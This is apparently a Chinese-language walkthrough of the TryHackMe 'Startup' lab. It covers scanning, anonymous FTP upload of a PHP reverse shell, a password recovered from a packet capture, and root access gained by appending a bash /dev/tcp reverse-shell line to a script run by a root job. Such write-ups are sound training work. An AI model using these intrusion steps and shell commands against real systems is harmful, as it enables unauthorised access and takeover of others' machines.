免责声明
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
服务扫描
root💀kali)-[~]
└─# nmap -sV -Pn 10.10.171.61
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDT
Nmap scan report for 10.10.171.61
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp openftp vsftpd 3.0.3
22/tcp openssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp openhttpApache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds
开启了ftp,ssh,http服务
匿名登录ftp
┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x3 65534655344096 Nov 122020 .
drwxr-xr-x3 65534655344096 Nov 122020 ..
-rw-r--r--1 00 5 Nov 122020 .test.log
drwxrwxrwx2 65534655344096 Nov 122020 ftp
-rw-r--r--1 00251631 Nov 122020 important.jpg
-rw-r--r--1 00 208 Nov 122020 notice.txt
226 Directory send OK.
所有文件下载到本地分析,ftp文件夹里面没有任何东西,但是这个文件夹是可写的。
notice.txt内容
┌──(root💀kali)-[~/tryhackme/Startup]
└─# cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
maya可能是个ssh用户名?
important.jpg显示两行文字
Everybody asks who's the impostor
but nobody asks how's the impostor
没看明白有啥有用的信息。
渗透80端口
打开80服务看看,显示一段话:
No spice here!
Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!
— Dev Team
网页源代码里有一行注释:
when are we gonna update this??
目录爆破看看
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61 _|. _ ____ _|_v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt
Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log
Target: http://10.10.171.61/
[03:07:45] Starting:[03:08:41] 301 -312B- /files->http://10.10.171.61/files/
[03:08:42] 200 -1KB - /files/
[03:08:47] 200 -808B- /index.html
存在一个files文件夹,文件目录显示和ftp上是一样的。那渗透思路就很简单,直接ftp上传webshell到服务器,在web上访问触犯反弹shell,刚才我们已经知道,ftp文件夹是可写的
ftp上传webshell
┌──(root💀kali)-[~/tryhackme/Startup]
└─# ftp 10.10.171.61
Connected to 10.10.171.61.
220 (vsFTPd 3.0.3)
Name (10.10.171.61:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put /root/reverse-shell.php ./shell.php
local: /root/reverse-shell.php remote: ./shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
3460 bytes sent in 0.00 secs (28.6932 MB/s)
触发反弹,拿到webshell
┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:14:50 up 24 min,0 users,load average: 0.00, 0.01, 0.00
USER TTYFROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
根目录找到一个文件recipe.txt
www-data@startup:/$ cat recipe.txt
cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
What is the secret spicy soup recipe?
love
横向提权到lennie
查看home目录,发现存在一个用户:lennie,但是我们没有查看文件夹的权限 查看/etc/passwd/,发现另一个用户:vagrant
根目录还有一个文件夹incidents,所有者是www-data,里面有一个文件suspicious.pcapng,传回kali分析
用wirksharp查看数据包,貌似是上一手黑客的网络交互信息 在第177个数据片留下了lennie的密码
c4ntg3t3n0ughsp1c3
拿到user.txt
www-data@startup:/tmp$ su lennie
su lennie
Password: c4ntg3t3n0ughsp1c3
lennie@startup:/tmp$ cd /home
cd /home
lennie@startup:/home$ ls
ls
lennie
lennie@startup:/home$ cd lennie
cd lennie
lennie@startup:~$ ls
ls
Documentsscriptsuser.txt
提权到root
我们查看scripts文件夹以及里面的脚本
lennie@startup:~$ cd scripts
cd scripts
lennie@startup:~/scripts$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Nov 122020 .
drwx------ 6 lennie lennie 4.0K Nov6 08:43 ..
-rwxr-xr-x 1 root root 77 Nov 122020 planner.sh
-rw-r--r-- 1 root root1 Nov6 08:57 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
lennie@startup:~/scripts$ ls -alh /etc/print.sh
ls -alh /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 122020 /etc/print.sh
分析
planner.sh这个文件属于root,按文件名来看属于某种定时任务,普通用户对于这个文件没有写权限。但是这个脚本调用了另一个脚本/etc/print.sh,这个脚本的属组是lennie。也就是说我们可以把反弹shell写进这个脚本
攻击
写脚本到/etc/print.sh
lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
<cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh
lennie@startup:~/scripts$ cat /etc/print.sh
cat /etc/print.sh
#!/bin/bash
echo "Done!"
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1
开启监听,等大约一分钟,拿到root权限
┌──(root💀kali)-[~/tryhackme/Startup]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342
bash: cannot set terminal process group (2909): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt
559
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
